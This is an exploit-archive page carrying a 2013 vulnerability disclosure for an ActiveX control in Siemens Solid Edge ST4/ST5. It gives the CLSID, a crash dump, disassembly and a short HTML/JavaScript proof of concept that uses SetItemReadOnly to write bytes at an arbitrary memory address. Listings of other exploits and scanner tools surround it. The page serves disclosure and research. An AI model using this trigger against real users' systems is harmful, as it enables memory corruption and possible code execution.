"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2013-05-26

                
                    
                         Download file
                    
                
            
SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly  
Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

file tested: SolidEdgeV104ENGLISH_32Bit.exe


background:

the mentioned software installs an ActiveX control with 
the following settings:

ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Vulnerability:

This control exposes the SetItemReadOnly() method, see typelib:

...
/* DISPID=14 */
	function SetItemReadOnly(
		/* VT_VARIANT [12]  */ $hItem,
		/* VT_BOOL [11]  */ $bReadOnly 
		)
	{
	}
...

(i)
By setting to a memory address the first argument
and the second one to 'false' you can write a NULL
byte inside an arbitrary memory region.

(ii)
By setting to a memory address the first argument
and the second one to 'true' you can write a \x08
byte inside an arbitrary memory region.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618



vulnerable code, inside the close control.dll:
...
;------------------------------------------------------------------------------
  		Align	4
 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
  		push	ebp
  		mov	ebp,esp
  		mov	eax,[ebp+08h]
  		test	eax,eax
  		jz 	L1011D15C
  		cmp	dword ptr [ebp+0Ch],00000000h
  		jz 	L1011D158
  		or	dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
  		pop	ebp
  		retn	0008h
;------------------------------------------------------------------------------
...

...
;------------------------------------------------------------------------------
 L1011D158:
  		and	dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here           
 L1011D15C:
  		pop	ebp
  		retn	0008h
;------------------------------------------------------------------------------
...

As attachment, code to reproduce the crash.



<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false); 
obj.SetItemReadOnly(0x61616161,true); 
</script>

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2013-12-11	"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution"	remote	windows	rgod
2013-10-04	"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution"	remote	php	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution"	dos	windows	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution"	remote	windows	rgod
2013-01-07	"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution"	remote	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion"	remote	windows	rgod
2012-08-06	"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution"	dos	windows	rgod
2012-05-11	"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow"	local	windows	rgod
2012-04-30	"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution"	remote	windows	rgod
2012-04-05	"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite"	remote	windows	rgod
2012-04-05	"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite"	remote	windows	rgod
2012-03-28	"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes"	remote	windows	rgod
2012-03-28	"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow"	remote	hardware	rgod
2012-03-28	"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution"	remote	windows	rgod
2012-03-28	"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow"	remote	hardware	rgod
2012-03-22	"Google Talk - 'gtalk://' Deprecated URI Handler Injection"	remote	windows	rgod
2012-03-22	"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)"	dos	windows	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion"	remote	windows	rgod
2012-03-19	"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal"	webapps	jsp	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution"	remote	windows	rgod
2012-03-19	"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow"	remote	windows	rgod
2012-03-19	"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute"	remote	windows	rgod
2012-03-19	"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite"	remote	windows	rgod
2011-11-07	"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow"	remote	windows	rgod
2011-11-02	"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution"	remote	windows	rgod
2011-10-31	"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2011-10-24	"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method"	remote	windows	rgod

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.